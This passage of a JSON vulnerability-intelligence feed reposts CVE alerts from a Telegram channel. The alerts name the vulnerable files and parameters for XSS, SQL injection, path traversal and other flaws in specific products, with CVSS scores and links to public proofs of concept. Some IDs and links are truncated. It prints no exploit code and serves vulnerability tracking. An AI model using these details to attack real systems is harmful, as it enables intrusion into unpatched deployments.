App 1.0 and classified as problematic. This vulnerability affects unknown code of the file /js-todo-app/index.html. The manipulation of the argument Add leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T21:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T21:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0228\n2. https://code-projects.org\n3. https://vuldb.com/?ctiid.290218\n4. https://vuldb.com/?id.290218\n5. https://vuldb.com/?submit.44049", "creation_timestamp": "2025-01-05T21:36:39.000000Z"}, {"uuid": "bd448821-a62a-405d-824a-e2f618a3548c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3PWM-MF62-VQ4P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/138", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-3pwm-mf62-vq4p\n\ud83d\udd17 Aliases: CVE-2025-0225\n\ud83d\udd39 Details: A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: '/../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-23\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0225\n2. https://github.com/BxYQ/ld/blob/main/file_read4/poc.py\n3. https://github.com/BxYQ/ld/tree/main/file_read4\n4. https://vuldb.com/?ctiid.290215\n5. https://vuldb.com/?id.290215\n6. https://vuldb.com/?submit.44264", "creation_timestamp": "2025-01-05T18:41:06.000000Z"}, {"uuid": "416050a0-f059-4531-84df-a85ad2a05534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JH2F-9MVC-3M3P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/128", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-jh2f-9mvc-3m3p\n\ud83d\udd17 Aliases: CVE-2024-13140\n\ud83d\udd39 Details: A vulnerability classified as problematic has been found in Emlog Pro up to 2.4.3. Affected is an unknown function of the file /admin/article.php?action=upload_cover of the component Cover Upload Handler. The manipulation of the argument image leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T12:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T12:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13140\n2. https://github.com/emlog/emlog/issues/312\n3. https://github.com/emlog/emlog/issues/312#issue-25854683\n4. https://vuldb.com/?ctiid.290214\n5. https://vuldb.com/?id.290214\n6. https://vuldb.com/?submit.46853", "creation_timestamp": "2025-01-05T12:39:38.000000Z"}, {"uuid": "aedd526b-7dba-4bdd-b2bd-4e5bcae9b3d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M84Q-P89F-6CC5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/174", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-m84q-p89f-6cc5\n\ud83d\udd17 Aliases: CVE-2024-12693\n\ud83d\udd39 Details: Out of bounds memory access in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2024-12-19T00:37:35Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12693\n2. https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html\n3. https://issues.chromium.org/issues/382190919", "creation_timestamp": "2025-01-06T15:38:25.000000Z"}, {"uuid": "fb160da3-6304-43a4-8646-415eba1ebdff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WJQ-JHPH-JC7Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/132", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-3wjq-jhph-jc7q\n\ud83d\udd17 Aliases: CVE-2025-0220\n\ud83d\udd39 Details: A vulnerability, which was classified as problematic, was found in Trimble SPS851 488.01. This affects an unknown part of the component Ethernet Configuration Menu. The manipulation of the argument Hostname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T15:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T15:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0220\n2. https://github.com/renanmalafatti/CVE/blob/main/CVE-2025-0220.md\n3. https://vuldb.com/?ctiid.290199\n4. https://vuldb.com/?id.290199\n5. https://vuldb.com/?submit.464943", "creation_timestamp": "2025-01-05T15:38:19.000000Z"}, {"uuid": "49d359f5-69ca-49f0-a6bb-b6d45d9d3c63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJHF-P3QM-W989", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/135", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mjhf-p3qm-w989\n\ud83d\udd17 Aliases: CVE-2025-0227\n\ud83d\udd39 Details: A vulnerability, which was classified as problematic, was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). This affects an unknown part of the file /Logs/Annals/downLoad.html. The manipulation of the argument path leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-200\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-022\n2. https://github.com/BxYQ/ld/blob/main/file_read1/poc.py\n3. https://github.com/BxYQ/ld/tree/main/file_read1\n4. https://vuldb.com/?ctiid.29021\n5. https://vuldb.com/?id.29021\n6. https://vuldb.com/?submit.44266", "creation_timestamp": "2025-01-05T18:40:46.000000Z"}, {"uuid": "7ff3c5d6-301d-4cf9-bd9c-5b404af20e78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CMMX-WWP2-X696", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/131", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-cmmx-wwp2-x696\n\ud83d\udd17 Aliases: CVE-2024-13141\n\ud83d\udd39 Details: A vulnerability classified as problematic was found in osuuu LightPicture up to 1.2.2. This vulnerability affects unknown code of the file /api/upload of the component SVG File Upload Handler. The manipulation of the argument file leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T15:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T15:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13141\n2. https://github.com/Hebing123/cve/issues/83\n3. https://vuldb.com/?ctiid.290224\n4. https://vuldb.com/?id.290224\n5. https://vuldb.com/?submit.468645", "creation_timestamp": "2025-01-05T15:38:11.000000Z"}, {"uuid": "1eeb963a-d5cd-4ee9-a234-eab89de392e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X45X-PQWC-C7F3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x45x-pqwc-c7f3\n\ud83d\udd17 Aliases: CVE-2025-0221\n\ud83d\udd39 Details: A vulnerability has been found in IOBit Protected Folder up to 1.3.0 and classified as problematic. This vulnerability affects the function 0x22200c in the library pffilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, CVSS_V4: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T15:30:30Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T15:30:30Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-404\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0221\n2. https://shareforall.notion.site/IOBit-Protected-Folder-pffilter-0x22200C-NP-OS-1526043bb1e80b2a4d42396d5d06c\n3. https://vuldb.com/?ctiid.290200\n4. https://vuldb.com/?id.290200\n5. https://vuldb.com/?submit.466955", "creation_timestamp": "2025-01-05T15:38:01.000000Z"}, {"uuid": "112b4e38-ba0a-4f6c-9a37-d91d4147b93b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R5JX-GQFH-5PMR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/134", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-r5jx-gqfh-5pmr\n\ud83d\udd17 Aliases: CVE-2025-0223\n\ud83d\udd39 Details: A vulnerability was found in IObit Protected Folder up to 13.6.0.5. It has been classified as problematic. Affected is the function 0x8001E000/0x8001E00C/0x8001E004/0x8001E010 in the library IURegistryFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, CVSS_V4: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-404\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0223\n2. https://shareforall.notion.site/IOBit-Uninstaller-IURegistryFilter-0x8001E000-NP-OS-1526043bb1e80e482e0e3c9b22b58d0\n3. https://vuldb.com/?ctiid.290202\n4. https://vuldb.com/?id.290202\n5. https://vuldb.com/?submit.466963", "creation_timestamp": "2025-01-05T18:40:41.000000Z"}, {"uuid": "326bbfe5-5c52-4466-a171-2fbeff2dfd21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V48G-9GC6-WM57", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/133", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-v48g-9gc6-wm57\n\ud83d\udd17 Aliases: CVE-2025-0224\n\ud83d\udd39 Details: A vulnerability was found in Provision-ISR SH-4050A-2, SH-4100A-2L(MM), SH-8100A-2L(MM), SH-16200A-2(1U), SH-16200A-5(1U) and NVR5-8200PX up to 20241220. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /server.js. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-200\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0224\n2. https://netsecfish.notion.site/Sensitive-evice-Information-isclosure-in-Provision-ISR-VR-1626b683e6c803881befbc30a93bf6?pvs=4\n3. https://vuldb.com/?ctiid.290203\n4. https://vuldb.com/?id.290203\n5. https://vuldb.com/?submit.46085", "creation_timestamp": "2025-01-05T18:40:35.000000Z"}, {"uuid": "cbce7e04-cfca-4d86-b677-4370a0937524", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-43H9-35C5-3259", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-43h9-35c5-3259\n\ud83d\udd17 Aliases: CVE-2025-0226\n\ud83d\udd39 Details: A vulnerability, which was classified as problematic, has been found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this issue is the function download of the file /collect/PortV4/downLoad.html. The manipulation of the argument path leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-200\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0226\n2. https://github.com/BxYQ/ld/blob/main/file_read2/poc.py\n3. https://github.com/BxYQ/ld/tree/main/file_read2\n4. https://vuldb.com/?ctiid.290216\n5. https://vuldb.com/?id.290216\n6. https://vuldb.com/?submit.44265", "creation_timestamp": "2025-01-05T18:40:58.000000Z"}, {"uuid": "edeaa3c4-8980-42c6-a124-32fcd441831f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6C3-7J6R-GQX3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/146", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-f6c3-7j6r-gqx3\n\ud83d\udd17 Aliases: CVE-2025-0232\n\ud83d\udd39 Details: A vulnerability was found in Codezips Blood Bank Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /successadmin.php. The manipulation of the argument psw leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-74\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0232\n2. https://github.com/alc900jmo/CVE/issues/\n3. https://vuldb.com/?ctiid.290228\n4. https://vuldb.com/?id.290228\n5. https://vuldb.com/?submit.4459", "creation_timestamp": "2025-01-06T00:35:54.000000Z"}, {"uuid": "1c337e40-2978-4ea3-95f5-b663a08ac256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24M8-VX7P-Q7MF", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/150", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-24m8-vx7p-q7mf\n\ud83d\udd17 Aliases: CVE-2024-12302\n\ud83d\udd39 Details: The Icegram Engage  WordPress plugin before 3.1.32 does not sanitise and escape some of its Campaign settings, which could allow authors and above to perform Stored Cross-Site Scripting attacks\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T06:30:46Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T06:30:45Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-12302\n2. https://wpscan.com/vulnerability/ed860dac-8c4a-482f-8826-31f1a894b6ce", "creation_timestamp": "2025-01-06T06:40:14.000000Z"}, {"uuid": "8f004948-d2f5-4c96-90f8-10df2831b959", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9G72-VRH2-4XQW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/136", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9g72-vrh2-4xqw\n\ud83d\udd17 Aliases: CVE-2025-0222\n\ud83d\udd39 Details: A vulnerability was found in IObit Protected Folder up to 13.6.0.5 and classified as problematic. This issue affects the function 0x8001E000/0x8001E004 in the library IUProcessFilter.sys of the component IOCTL Handler. The manipulation leads to null pointer dereference. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, CVSS_V4: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-05T18:30:35Z\n\ud83d\uddd3\ufe0f Published: 2025-01-05T18:30:35Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-404\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0222\n2. https://shareforall.notion.site/IOBit-Uninstaller-IUProcessFilter-0x8001E000-NP-OS-1526043bb1e809c81bbc484c53b1bc\n3. https://vuldb.com/?ctiid.290201\n4. https://vuldb.com/?id.290201\n5. https://vuldb.com/?submit.466956", "creation_timestamp": "2025-01-05T18:40:52.000000Z"}, {"uuid": "fa36a929-ef8a-4e4b-a62e-33c67c2ee3a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9H5M-XXFW-PFMJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/176", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-9h5m-xxfw-pfmj\n\ud83d\udd17 Aliases: CVE-2022-37056\n\ud83d\udd39 Details: D-Link GO-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 is vulnerable to Command Injection via /cgibin, hnap_main,\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T15:30:58Z\n\ud83d\uddd3\ufe0f Published: 2022-08-29T00:00:33Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-77, CWE-78\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2022-3056\n2. https://drive.google.com/file/d/12tqMUvAxQ4OlycoSNtcP0x2282Y5GJ/view?usp=sharing\n3. https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10308\n4. https://www.dlink.com/en/security-bulletin", "creation_timestamp": "2025-01-06T15:38:43.000000Z"}, {"uuid": "477e2175-c61b-4396-acce-8503c2b2dbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWPP-QXQ5-Q73H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/142", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-xwpp-qxq5-q73h\n\ud83d\udd17 Aliases: CVE-2025-0231\n\ud83d\udd39 Details: A vulnerability has been found in Codezips Gym Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /dashboard/admin/submit_payments.php. The manipulation of the argument m_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-74\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-0231\n2. https://github.com/gh464646/CVE/issues/1\n3. https://vuldb.com/?ctiid.29022\n4. https://vuldb.com/?id.29022\n5. https://vuldb.com/?submit.44596", "creation_timestamp": "2025-01-06T00:35:47.000000Z"}, {"uuid": "7e310e2b-3cf2-4fb4-a3a0-f43bd361cb16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J4JC-69X3-7RR6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/145", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-j4jc-69x3-7rr6\n\ud83d\udd17 Aliases: CVE-2024-13143\n\ud83d\udd39 Details: A vulnerability was found in ZeroWdd studentmanager 1.0. It has been rated as problematic. This issue affects the function submitAddPermission of the file src/main/java/com/zero/system/controller/PermissionController. java. The manipulation of the argument url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.\n\ud83d\udd22 Severity: CVSS_V3: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N, CVSS_V4: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\n\ud83d\uddd3\ufe0f Modified: 2025-01-06T00:30:41Z\n\ud83d\uddd3\ufe0f Published: 2025-01-06T00:30:41Z\n\ud83c\udff7\ufe0f CWE IDs: CWE-79\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-13143\n2. https://github.com/ZeroWdd/manager-system/issues/\n3. https://vuldb.com/?ctiid.290231\n4. https://vuldb.com/?id.290231\n5. https://vuldb.com/?submit.46921", "creation_timestamp": 